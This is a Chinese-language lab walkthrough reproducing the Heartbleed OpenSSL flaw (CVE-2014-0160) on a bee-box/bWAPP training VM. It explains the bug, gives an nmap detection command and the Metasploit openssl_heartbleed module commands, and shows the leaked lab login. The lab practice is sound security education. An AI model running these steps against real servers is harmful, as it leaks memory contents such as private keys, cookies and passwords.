CVE-2014-0160漏洞复现心脏滴血

漏洞说明
Heartbleed漏洞是由于未能在memcpy()调用受害用户输入内容作为长度参数之前正确进行边界检查。攻击者可以追踪OpenSSL所分配的64KB缓存、将超出必要范围的字节信息复制到缓存当中再返回缓存内容，这样一来受害者的内存内容就会以每次64KB的速度进行泄露。如同漏洞成因所讲，可以通过该漏洞读取每次攻击泄露出来的信息，所以可能也可以获取到服务器的私钥，用户cookie和密码等。
漏洞影响范围
OpenSSL1.0.1版本
漏洞复现
环境：本次环境使用 bee-box虚拟机(已集成该漏洞环境)进行测试
Ip地址：10.1.1.171
Kali IP地址：192.168.17.207

Bee-box键盘配置
system->preferences->keybord->layouts
点击add，拉到最下面找到USA，
keyboard model： A4Tech KB-21
如图所示：点Close关闭即可
用火狐访问8443端口
点击bWAPP登录

使用nmap 的脚本进行检测漏洞是否存在。
nmap -sV -p8443 --script ssl-heartblees.nse 10.1.1.171
-sV 版本详细信息 -p端口 --script指定扫描脚本
漏洞利用，打开kali，启动msf，命令msfconsole
使用搜索查找heartbleed模块命令：search heartbleed
use auxiliary/scanner/ssl/openssl_heartbleed
set RHOSTS 10.1.1.171
set RPORT 8443
run
显示存在着心脏滴血漏洞。。。。。。如图

set verbose true
设置主要是为了显示整个过程以及leak
exploit

可以看到登录的用户名为bee，密码为bug